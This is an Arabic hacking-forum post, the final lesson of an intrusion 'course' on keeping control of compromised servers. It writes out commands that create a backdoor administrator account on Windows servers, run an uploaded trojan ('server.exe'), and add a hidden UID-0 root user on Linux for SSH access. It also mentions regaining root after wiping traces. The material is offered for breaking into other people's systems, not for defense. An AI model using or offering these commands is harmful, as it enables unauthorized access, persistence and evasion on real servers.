s3cTur3.dll
°ˆ~*¤®§(*§الأداَره §*)§®¤*~ˆ°
المشاركات : 749
تاريخ الميلاد : 14/04/1998
تاريخ التسجيل : 13/09/2010
العمر : 26
الجنس : 
 |  موضوع: خـــاتمـــه الدوره  الجمعة مارس 18 2011, 11:32 | |
| [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
كيفكون حبايبي ؟
ختام الدورة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
تعلمنا بالدرس الماضي كيف نسحب روت على سيرفرات لينوكس ونسيطر على النظام
طيب اذا كان السيرفر ويندوز !!
طبعا السيطرة على انظمة الويندوز تختلف عن اللينوكس ... لكن بدها خبرة بالميتا سبلويت والبفر اوفر فلو لاول طريقتين
لمحة صغيرة :
1- الميتا سبلويت غني عن التعريف ... في ثغرات
خاصة بالميتا بتسمحلنا نضيف يوزر جديد بصلاحية ادمن الى سيرفرات الويندوز
عن بعد ( remote )
2- البفر اوفر فلو : معناه بالعربي فيض الذاكرة ..... طبعا بشكل مبسط جدا مشان ما فوتكون بالحيط :
ثغرة بالبرنامج يمكنا من استثماره عن بعد بشل كود لتغيير مسار تدفق المعلومات > تمكنا من السيطرة على النظام ~
طبعا ثغرات البفر اوفر فلو معقدة واكتشافها واستغلالها صعب ... لان بدها
خبرة كبيرة بلغة الاسمبلي ... خطورتها !! ... كبيرة جدا ..~ .!
ملاحظة مهمة : ذكرت اول طريقة بدها خبرة كبيرة بالميتا .... وبالطريقة الثانية بدها خبرة بلغة الاسمبلي ... لهيك ما يجي حدا ويقلي ليش ما نزلت مثال !
لان حتى لو نزلت مثال لو ما عندك خبرة بهالمجاليين ما رح تفهم شي ~
وخبراء الميتا بيعرفو شو عم بحكي .... اما الاسمبلي فانا اول الناس ما بفهم فيها ابدا والناس يلي بيفهمو بهاللغة قليلين جدا !
بعد ما عرفنا انه هناك 3 طرق للسطيرة على سيرفرات الويندوز وعرفنا اول
طريقتين نجي الان الى الطريقة الثالثة وهي تطبق على اصدارات IIS 5 وما دون ~
الامر بسيط جدا نروح ننفذ الامرين التاليين :
كود:
net user Niroda 123456 /add
حيث ان Niroda هو اسم المستخدم الجديد ..
123456 هو الباسورد ~
بعدين بنطبق الامر :
كود:
net localgroup administrators Niroda /add
وهذا الامر بيضيف اليوزر Niroda الى مجموعة administrator وهي المجموعة المسؤولة عن النظام
طبعا بحب انوه شروط تنفيذ الامريين السابقين :
1- سيف مود اوف ~
2- اصدار النظام IIS 5 وما دون ~
طبعا بعد ما ننفذ الامرين السابقين اذا كان السيرفر بيدعم سطح المكتب البعيد ( Remote Desk Top ) بنتصل فيه مثل اي ريموت ثاني
الطريقة الاخيرة وهي اختراق النظام بباتش .. لان النظام عبارة عن ويندوز واختراقه مثله مثل اي جهاز ثاني ~
بنرفع الباتش على الموقع ... وبنشغله بالامر :
كود:
start server.exe
حيث ان server.exe هو اسم الباتش الخاص بك ~
وهيك بنكون خلصنا من شرح السيطرة على الويندوز
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الان بننتقل الى اللينوكس مرة ثانية :
بنجي الى امر اضافة يوزر بصلاحية روت والدخول به عن طريق برنامج Putty
الامر بسيط جدا ... بنطبق الامر التالي :
كود:
/usr/sbin/useradd -o -u 0 -g 0 Niroda -p 123456
الامر السابق هو عبارة عن اضافة يوزر باسم Niroda الى النظام بصلاحية روت والباسورد الخاص فيه 123456
للتاكيد فقط لا أكثر بنروح بنغيير الباسورد بالامر :
كود:
passwd username
طبعا بنغير بدال username باسم اليوزر يلي ضفناه
رح تطلع رسالة تطلب منا ادخال الباسورد الجديد بنحط الباسورد الجديد او نفس الباسورد ما بتفرق فقط مشان نتاكد من اضافة اليوزر ~
ورح يرجع يطلب من تأكيد الباسورد الجديد ~
الان بنروح بناخذ اي بي السيرفر وبنروح لبرنامج البيوتي ويلي ما عنده البرنامج يحمله من هون
كود:
http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
اذا دخل معنا معناها كل شي تمام ... بس اذا ما دخل معناها البورت مغيير :S
بسيطة جدا ... بنروح بنفذ الامر :
كود:
cat /etc/ssh/sshd_config
رح يطلعلنا الكونفيغ الخاص بالشل ... بنشوف باول الكونفيغ مكتوب port ... بنشوف شو الرقم الموجود قدام كلمة بورت ؟
هو بيكون المنفذ ... بنروح للبيوتي وبنتصل بالبيوتي مع تغيير البورت [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
الان درس الرجوع للروت ~
رابط التحميل : [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
رابط الموضوع الاصلي :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا في طرق كثيرة جدا للرجوع للروت وبنظري هذه اقوى طريقة للرجوع للروت بعد مسح الاثار والتخزين المؤقت [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
طبعا في فكرة ببالي قيد التطوير رح اطرحها بقسم اختراق المواقع والسيرفرات
عن قريب ان شاء الله بعد ما تنجح مية مية بخصوص الرجوع للروت وهي طريقة
جديدة [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذه الصورة]
وأكيد رح اطرحلكم طرق جديدة أول بأول ... لان كل يوم في حماية جديدة وكل يوم في طريقة اختراق جديدة
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
في نهاية الدورة ... كلمة اخيرة ~ :
الدورة كانت تهتم بالمبتدأ بالدرجة الاولى ~
ما تعمقت بشرح كل التفاصيل الصغيرة والكبيرة والسبب :
ما بحب اعلم حدا ويكون مثل الببغاء يقلد وبس من دون ما يعرف ويفهم شو عم يعمل !
حطيتلكون المبادئ والامور الغامضة وشرحتلكم الاسباب والثغرات وطرق الاستغلال ~
باقي عليكون تطورو انفسكون ... وبتمنى من الكل ما حدا يعتمد على حدا ثاني ... حاول تشغل عقلك
انت عندك عقل وغيرك عنده عقل .... ليش هو بيخترق وانت لا !
رح تقول ان هو في حدا معلمو ؟ .... أكيد مو كل الناس في حدا معلمها ... وانا اقرب مثال ....
يشهد الله ما حدا علمني حرف واحد بالهاك والاختراق ~
شاهدت بعض الشروحات ووالله كنت اعيد الشرح مرة واثنين وثلاثة واربعة وعشرة
وعشرين مرة لحتى افهم الفكرة ... لان الشروحات الموجودة بالمنتديات كلها
بتكون نص بنص من دون ما تفهم الواحد سبب تشكل الثغرة وكيفية استغلال الثغرة
...
كل الشروحات يلي شفتها كانت عبارة عن فيديو بيرفعلك شل بثغرة معينة من دون ما يفهمك شو عم يشتغل :S
الى هون بنوصل لنهاية الموضوع .... واني بريء أمام الله وامامكم من اي اختراق لموقع مسلم
اتمنى تكونو استفدتو من الدورة واتمنالكم الاحتراف باذن الله عز وجل
...........
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
| |
|
